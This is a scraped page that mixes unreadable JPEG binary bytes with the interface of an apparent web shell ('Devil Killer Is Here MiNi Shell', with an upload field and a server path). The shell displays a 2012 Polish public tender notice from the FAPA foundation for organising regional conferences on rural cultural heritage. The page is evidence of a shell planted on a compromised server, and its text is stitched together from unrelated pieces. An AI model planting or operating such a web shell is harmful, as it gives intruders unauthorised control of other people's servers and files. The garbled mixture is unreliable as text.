JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120830/323644-N-2012.html

<p class="kh_header"><b>Warszawa: Zakup usług polegających na kompleksowej realizacjj projektu: Dziedzictwo kulturowe na wsi - wiedza, dobre praktyki, wyzwania</b><br>
<b>Numer ogłoszenia: 323644 - 2012; data zamieszczenia: 30.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Fundacja Programów Pomocy dla Rolnictwa FAPA , ul. Wspólna 30, 00-930 Warszawa, woj. mazowieckie, tel. 22 623 19 01, faks 22 623 19 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.fapa.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Fundacja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług polegających na kompleksowej realizacjj projektu: Dziedzictwo kulturowe na wsi - wiedza, dobre praktyki, wyzwania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup usług polegających na zapewnieniu kompleksowej realizacji projektu: Dziedzictwo kulturowe na wsi - wiedza, dobre praktyki, wyzwania, zwanego dalej Projektem. Celami projektu są: 1) przekazanie wiedzy na temat dziedzictwa kulturowego pozwalającej na identyfikację jego zasobów w każdej wsi przez szerokie grupy odbiorców, szczególnie przez organizacje pozarządowe działające na wsi, 2) zaprezentowanie szerokiej grupie odbiorców metod realizacji projektów z zakresu dziedzictwa kulturowego, ukazanie ich specyfiki i różnorodności oraz problemów pojawiających się w trakcie ich realizacji, 3) zintegrowanie ze sobą przedstawicieli organizacji pozarządowych zainteresowanych realizacją projektów, oraz osób i instytucji, które w danym regionie zajmują się tematyką dziedzictwa kulturowego i mogą służyć wsparciem w realizacji projektów (m.in. konserwatorzy zabytków, osoby zajmujące się produktem regionalnym, etnografowie, architekci i specjaliści od krajobrazu, pracownicy muzeów, pracownicy parków narodowych i krajobrazowych, pracownicy uczelni wyższych, pasjonaci lokalnej historii, przedstawiciele lokalnych grup działania, pracownicy oddziałów Narodowego Instytutu Dziedzictwa), 4) wymiana doświadczeń oraz przekazanie dobrych praktyk odbiorcom projektu, 5) promocja całościowego sposobu myślenia o dziedzictwie kulturowym, obejmującego zarówno aspekty materialne (krajobraz, architekturę, przedmioty codziennego użytku, przedmioty kultu religijnego, przedmioty ozdobne,  a także tradycyjne produkty regionalne), jak i niematerialne (techniki i umiejętności, język, taniec, tradycje życia rodzinnego, sąsiedzkiego, wspólnotowego, podania, opowiadania, legendy przesądy), 6) zachęcenie mieszkańców wsi do realizacji projektów na rzecz ochrony dziedzictwa kulturowego. Wykonawca zrealizuje przedmiot zamówienia zgodnie z ww. celami projektu. W celu realizacji przedmiotu zamówienia Wykonawca zorganizuje Biuro Projektu, zwane dalej Biurem, odpowiedzialne za całość prac związanych z realizacją Projektu. W celu sprawnego funkcjonowania Biura Wykonawca zapewni: a) zespół składający się z osób zapewniających prawidłową i terminową realizację Projektu; b) minimum jeden numer telefonu stacjonarnego, numer telefonu komórkowego, numer faksu oraz adres mailowy i korespondencyjny; c)	organizację pracy, która umożliwi łatwy kontakt z przedstawicielami Biura. Czas odpowiedzi na zapytanie mailowe nie może przekroczyć dwóch dni roboczych; Przedstawiciele Biura będą ściśle współpracować z Zamawiającym i na bieżąco dostarczać wszelkich informacji o realizacji Projektu. Podstawowe zadania Biura: 1. Kompleksowa organizacja i realizacja pięciu dwudniowych konferencji regionalnych. W czasie każdej z konferencji nacisk zostanie położony zarówno na uniwersalne zagadnienia związane z ochroną i spożytkowaniem dziedzictwa kulturowego jak i przede wszystkim na lokalną specyfikę dziedzictwa kulturowego regionu oraz na jego znaczenie w rozwoju lokalnym. Celem konferencji jest m.in. wymiana doświadczeń pomiędzy samorządami, organizacjami samorządowymi, lokalnymi grupami działania i osobami oraz instytucjami danego regionu zajmującymi się problematyką dziedzictwa kulturowego. Zaangażowanie partnerów z różnych sektorów sprzyja lepszej realizacji projektów dzięki wykorzystaniu wiedzy i umiejętności wielu partnerów. W ramach tego zadania Wykonawca zapewni: a) realizację każdej z pięciu dwudniowych konferencji regionalnych, zgodnie z poniższymi wymaganiami: - konferencje regionalne każdorazowo zostaną zrealizowane zgodnie z programem konferencji, stanowiącym Załącznik nr 6 do SIWZ, - konferencje regionalne zostaną zrealizowane na terenie następujących województw: I. dolnośląskiego lub opolskiego lub śląskiego (dla uczestników z województw: dolnośląskiego, opolskiego i śląskiego), II. podkarpackiego lub małopolskiego (dla uczestników z województw: podkarpackiego i małopolskiego), III. zachodniopomorskiego lub pomorskiego lub kujawsko-pomorskiego (dla uczestników z województw: zachodniopomorskiego, pomorskiego i kujawsko-pomorskiego), IV. lubelskiego lub podlaskiego lub mazowieckiego (dla uczestników z województw: lubelskiego, podlaskiego oraz wschodniej części województwa mazowieckiego), V. łódzkiego lub świętokrzyskiego lub mazowieckiego (dla uczestników z województw: łódzkiego, świętokrzyskiego oraz zachodniej części województwa mazowieckiego), - wykładowcy muszą posiadać dorobek naukowy w dziedzinie dziedzictwa kulturowego wsi (np. architektura, krajobraz, etnografia) lub posiadać co najmniej pięcioletnie doświadczenie w pracy zawodowej na rzecz dziedzictwa kulturowego. Wykonawca każdorazowo najpóźniej w terminie 14 dni przed pierwszym dniem każdej z konferencji przekaże Zamawiającemu listę wykładowców wraz z załączonymi CV wykładowców. Wykonawca zrealizuje wszystkie konferencje w terminie do dnia 30 sierpnia 2013 r. b) nabór uczestników każdej z pięciu dwudniowych konferencji regionalnych - do udziału w każdej z konferencji zostaną zaproszeni: - przedstawiciele instytucji działających na rzecz dziedzictwa kulturowego (zarówno państwowych, samorządowych, jak i prywatnych), - przedstawiciele władz samorządowych, - konserwatorzy zabytków, - osoby zajmujące się produktem regionalnym, - etnografowie, - architekci i specjaliści od krajobrazu, - pracownicy muzeów, parków narodowych i krajobrazowych, wyższych uczelni, - pasjonaci lokalnej historii, - przedstawiciele lokalnych grup działania, - pracownicy oddziałów Narodowego Instytutu Dziedzictwa. Jeden uczestnik bądź reprezentant jednej instytucji może wziąć udział w jednej konferencji regionalnej. W każdej z pięciu konferencji weźmie udział 100 osób. Wykonawca każdorazowo najpóźniej w terminie 14 dni przed pierwszym dniem każdej z konferencji przekaże Zamawiającemu imienną listę uczestników tej konferencji, wraz ze wskazaniem podstawy zaproszenia uczestnika do udziału w konferencji. c) sale konferencyjne, niezbędne do realizacji każdej z pięciu dwudniowych konferencji regionalnych, zgodnie z poniższymi wymaganiami: - ilość: jedna sala konferencyjna, podczas pierwszego i drugiego dnia każdej z pięciu dwudniowych konferencji regionalnych, o których mowa w pkt. III.a) tiret 2 pkt. I.-V. SIWZ, oraz dodatkowo dwie sale konferencyjne podczas drugiego dnia każdej z pięciu dwudniowych konferencji, o których mowa w pkt. III.a) tiret 2 pkt. I.-V. SIWZ- termin: każdorazowo termin każdej z pięciu konferencji regionalnych, o których mowa w pkt. III..1.a) tiret 2 pkt. I.-V. SIWZ, - miejsce: każdorazowo w miejscach konferencji, o których mowa w punktach III.1.a) tiret 2 pkt. I.-V. SIWZ, - minimalne wyposażenie: jedna sala konferencyjna wyposażona w co najmniej 100 miejsc siedzących (w przypadku większej ilości uczestników, sala musi być wyposażona w ilość miejsc siedzących odpowiadającą liczbie uczestników konferencji), nagłośnienie, pięć mikrofonów bezprzewodowych, rzutnik multimedialny oraz komputer (sala zostanie zapewniona każdorazowo pierwszego i drugiego dnia konferencji regionalnych) oraz dwie sale konferencyjne przeznaczone na przeprowadzenie warsztatów, o których mowa w Załączniku nr 6 do SIWZ (sale zostaną zapewnione każdorazowo drugiego dnia konferencji regionalnych), wyposażone we flipcharty. Na każdej z konferencji Wykonawca umieści w widocznym miejscu banner zawierający logotypy i slogany określone w Załączniku nr 7 do SIWZ. Wykonawca wykona niniejsze zadanie w terminie do dnia 30 sierpnia 2013 roku. 2. Kompleksowa organizacja i realizacja jednodniowej ogólnopolskiej konferencji podsumowującej projekt. Celem konferencji jest zaprezentowanie i omówienie najważniejszych wniosków wypracowanych podczas konferencji regionalnych. Konferencja będzie poświęcona ogólnym problemom związanym z realizacją projektów na wsi, poświęconych ochronie i spożytkowaniu dziedzictwa kulturowego. W ramach tego zadania wykonawca zapewni: a) realizację konferencji, zgodnie z poniższymi wymaganiami: - konferencja zostanie zrealizowana zgodnie z programem konferencji, stanowiącym Załącznik nr 8 do SIWZ, - konferencja zostanie zrealizowana na terenie miasta Warszawy, - wykładowcy muszą posiadać dorobek naukowy w dziedzinie dziedzictwa kulturowego wsi (np. architektura, krajobraz, etnografia) lub posiadać co najmniej pięcioletnie doświadczenie w pracy zawodowej na rzecz dziedzictwa kulturowego. Wykonawca najpóźniej w terminie 14 dni przed dniem realizacji konferencji przekaże Zamawiającemu listę wykładowców wraz z załączonymi CV wykładowców. Wykonawca zrealizuje konferencję po zrealizowaniu wszystkich konferencji regionalnych, o których mowa w pkt. III.1 SIWZ, jednak nie później niż w terminie do dnia 30 września 2013 r. b) nabór uczestników konferencji - do udziału w konferencji zaproszeni zostaną: - przedstawiciele instytucji działających na rzecz dziedzictwa kulturowego (zarówno państwowych, samorządowych, jak i prywatnych), - przedstawiciele władz samorządowych, - konserwatorzy zabytków, - osoby zajmujące się produktem regionalnym, - etnografowie, - architekci i specjaliści od krajobrazu, - pracownicy muzeów, parków narodowych i krajobrazowych, wyższych uczelni, - pasjonaci lokalnej historii, - przedstawiciele lokalnych grup działania, - pracownicy oddziałów Narodowego Instytutu Dziedzictwa. W konferencji ogólnopolskiej mogą wziąć udział również uczestnicy konferencji regionalnych. W konferencji weźmie udział 60 osób. Wykonawca najpóźniej w terminie 14 dni przed dniem realizacji konferencji przekaże Zamawiającemu imienną listę uczestników tej konferencji, wraz ze wskazaniem podstawy zaproszenia uczestnika do udziału w konferencji. c) jedną salę konferencyjną, niezbędną do realizacji konferencji, zgodnie z poniższymi wymaganiami: - termin: termin realizacji konferencji, - miejsce: miejsce realizacji konferencji, - minimalne wyposażenie: co najmniej 60 miejsc siedzących (w przypadku większej ilości uczestników, sala musi być wyposażona w ilość miejsc siedzących odpowiadającą liczbie uczestników konferencji), nagłośnienie, pięć mikrofonów bezprzewodowych, rzutnik multimedialny, komputer oraz flipcharty. Na konferencji Wykonawca umieści w widocznym miejscu banner zawierający logotypy i slogany określone w Załączniku nr 7 do SIWZ. Wykonawca wykona niniejsze zadanie po zrealizowaniu wszystkich konferencji regionalnych, o których mowa w pkt. III.1 SIWZ, jednak nie później niż w terminie do dnia 30 września 2013 roku. 3. Obsługa cateringowa konferencji, o których mowa w pkt. III.1 i III.2 SIWZ. W ramach tego zadania Wykonawca zapewni: a) obsługę cateringową każdej z konferencji regionalnych, o których mowa w pkt. III.1 SIWZ - zgodnie z poniższymi wymaganiami: - ilość osób: każdorazowo liczba odpowiadająca liczbie uczestników każdej z konferencji regionalnych, - termin: każdorazowo termin realizacji każdej z konferencji regionalnych, - miejsce: każdorazowo miejsce realizacji każdej z konferencji regionalnych, - zakres usługi - podczas każdej z konferencji regionalnych Wykonawca zapewni: obiad pierwszego oraz drugiego dnia konferencji, składający się z dwóch dań gorących, deseru oraz napojów, trzy przerwy kawowe pierwszego oraz drugiego dnia konferencji, podczas których podana zostanie kawa, herbata, woda, napoje, ciasteczka, kolację pierwszego dnia konferencji. b) obsługę cateringową konferencji ogólnopolskiej, o której mowa w pkt. III.2 SIWZ - zgodnie z poniższymi wymaganiami: - ilość osób: liczba odpowiadająca liczbie uczestników konferencji ogólnopolskiej, - termin: termin realizacji konferencji ogólnopolskiej, - miejsce: miejsce realizacji konferencji ogólnopolskiej, - zakres usługi - podczas każdej z konferencji regionalnych Wykonawca zapewni: obiad składający się z dwóch dań gorących, deseru oraz napojów, jedna przerwa kawowa, podczas której podana zostanie kawa, herbata, woda, napoje, ciasteczka, 4. Noclegi ze śniadaniem dla uczestników konferencji regionalnych, o których mowa w pkt. III.1 SIWZ. W ramach tego zadania Wykonawca zapewni noclegi wraz ze śniadaniem dla wszystkich uczestników każdej z konferencji regionalnych, o których mowa w pkt. III.1 SIWZ -  każdorazowo zgodnie z poniższymi wymaganiami: - ilość osób: każdorazowo liczba odpowiadająca liczbie uczestników każdej z konferencji regionalnych, - termin: każdorazowo termin realizacji każdej z konferencji regionalnych, - miejsce: każdorazowo miejsce realizacji każdej z konferencji regionalnych. Nocleg zostanie zapewniony w pokojach jedno- i/lub dwuosobowych, w hotelu o standardzie co najmniej dwugwiazdkowym lub innym obiekcie o równorzędnym standardzie. 5. Projekt, wykonanie oraz dystrybucja materiałów konferencyjnych. W ramach tego zadania Wykonawca zapewni: a) notesy - zgodnie z poniższymi wymaganiami: - ilość: liczba odpowiadająca liczbie uczestników konferencji, o których mowa w pkt. III.1 i III.2 SIWZ, - format: A5 lub większy, - liczba stron: co najmniej 64, b) długopisy - zgodnie z poniższymi wymaganiami: - ilość: liczba odpowiadająca liczbie uczestników konferencji, o których mowa w pkt. III.1 i III.2 SIWZ, c) torby na ramię - zgodnie z poniższymi wymaganiami: - ilość: liczba odpowiadająca liczbie uczestników konferencji, o których mowa w pkt. III.1 i III.2 SIWZ, - torby muszą być wykonane z materiału, d) programy konferencji, o których mowa w pkt. III.1 i III.2 SIWZ - zgodnie z poniższymi wymaganiami: - ilość: liczba odpowiadająca liczbie uczestników konferencji, o których mowa w pkt. III.1 i III.2 SIWZ, Materiały promocyjne, o których mowa w niniejszym punkcie, zostaną przekazane wszystkim uczestnikom konferencji, o których mowa w pkt. III.1 oraz III.2 SIWZ, podczas i w związku z tymi konferencjami. Wszelkie materiały promocyjne, o których mowa w niniejszym punkcie muszą zawierać stałą wizualizację logotypów określonych w Załączniku nr 7 do SIWZ. Wykonawca przekaże Zamawiającemu po jednym egzemplarzu każdego z materiałów promocyjnych najpóźniej 14 dni przed terminem realizacji pierwszej z konferencji, o których mowa w pkt. III.1 SIWZ. 6. Wykonawca wykona niniejsze zamówienie w porozumieniu z partnerami projektu. Partnerami projektu są: a) Fundacja Wspomagania Wsi, b) Towarzystwo Przyjaciół Ziemi Dubieckiej, c) A JEDNAK Fundacja na rzecz zagospodarowania zrujnowanych zabytków i wspomagania przedsiębiorczości, d) Mazowieckie Stowarzyszenie Gmin na Rzecz Rozwoju Społeczeństwa Informacyjnego. Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy, stanowiącym załącznik nr 9 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.60.00-0, 55.10.00.00-1, 55.30.00.00-3, 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek ten za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy niż 3 lata - w tym okresie, wykonał lub wykonuje, co najmniej 3 (trzy) usługi 
o wartości każdej usługi nie mniejszej niż 100 000,00 zł brutto każda (słownie: sto tysięcy złotych 00/100), z których każda polegała na zapewnieniu kompleksowej organizacji konferencji lub innego wydarzenia o podobnym charakterze, obejmującej łącznie co najmniej wyżywienie oraz zakwaterowanie uczestników i każda z tych usług organizowana była dla co najmniej 100 osób. Wykonanie jednej usługi jest równoznaczne z wykonaniem jednej umowy (jednego zamówienia na rzecz jednego Zamawiającego).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą wiedzę niezbędną do wykonania kompleksowej organizacji i realizacji konferencji lub innego wydarzenia o podobnym charakterze oraz co najmniej trzyletnie doświadczenie w tym zakresie.
Wykonawca może zaproponować większą ilość osób uczestniczących w realizacji niniejszego zamówienia, jednakże w takim przypadku, każda osoba wskazana dodatkowo ponad wymagane minimum, musi spełniać powyższy warunek udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.fapa.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Fundacja Programów Pomocy dla Rolnictwa FAPA
ul. Wspólna 30
00-930 Warszawa.</p>
